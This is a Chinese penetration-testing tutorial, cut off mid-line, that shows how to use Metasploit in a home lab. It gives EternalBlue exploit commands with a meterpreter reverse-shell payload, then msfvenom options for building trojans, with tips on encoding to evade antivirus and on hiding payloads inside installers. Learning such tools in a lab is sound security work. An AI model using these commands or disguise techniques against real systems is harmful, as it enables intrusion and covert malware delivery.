Metasploit的使用
一、概要
在渗透测试中,通常利用Metasplpit Framework和Cobalt Strike生成木马进行使用,本次我们以Metasploit进行演示
二、实验环境
使用机器:
攻击机:kali虚拟机 192.168.36.129
靶 机:win8.1 192.168.36.130
(确保你的kali是能够被ping通的,后面会做解释)
三、使用方法
1.基础使用
msfconsole #进入框架
search ms17_010 # 使用search命令查找相关漏洞
use exploit/windows/smb/ms17_010_eternalblue # 使用use选择模块
set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷
show options / options #查看模块需要配置的参数
set RHOST ip/ip段 #RHOSTS 参数是要探测主机的ip或ip范围,可以探测一个ip范围内的主机是否存在漏洞
exploit / run #启用监听--攻击
示例中是以MS17_010(永恒之蓝)smb漏洞进行攻击,但是现在新版Windows这个漏洞大都被修复了,所以我们用另一种方式进行渗透↓
2.msfvenum模块
常用参数介绍:
-l --list <type> 列出模块的所有可用资源
-p --payload < payload> 也可使用自定义的payload,几乎是支持全平台的(Windows、Linux、iOS、Android)
-a --arch < architecture> 指定payload的目标架构,一般是x86(32位平台)和x64(64位平台)
-o --out < path> 指定创建好的payload的存放位置
-s --space < length> 设定有效攻击荷载的最大长度,就是文件大小(一般木马文件只有几kb)
-i --iterations < count> 指定payload的编码次数(理论上次数越多越容易免杀……但不能代替免杀)
-c --add-code < path> 指定一个附加的win32 shellcode文件
-x --template < path> 指定一个自定义的可执行文件作为模板,并将payload嵌入其中(因为做出来的木马文件,运行后并没有任何效果出现,为了更加的真实,可以将木马文件嵌入到一个安装包或压缩包等文件中)
-k --keep 保护模板程序的动作,注入的payload作为一个新的进程运行
--platform < platform> 指定p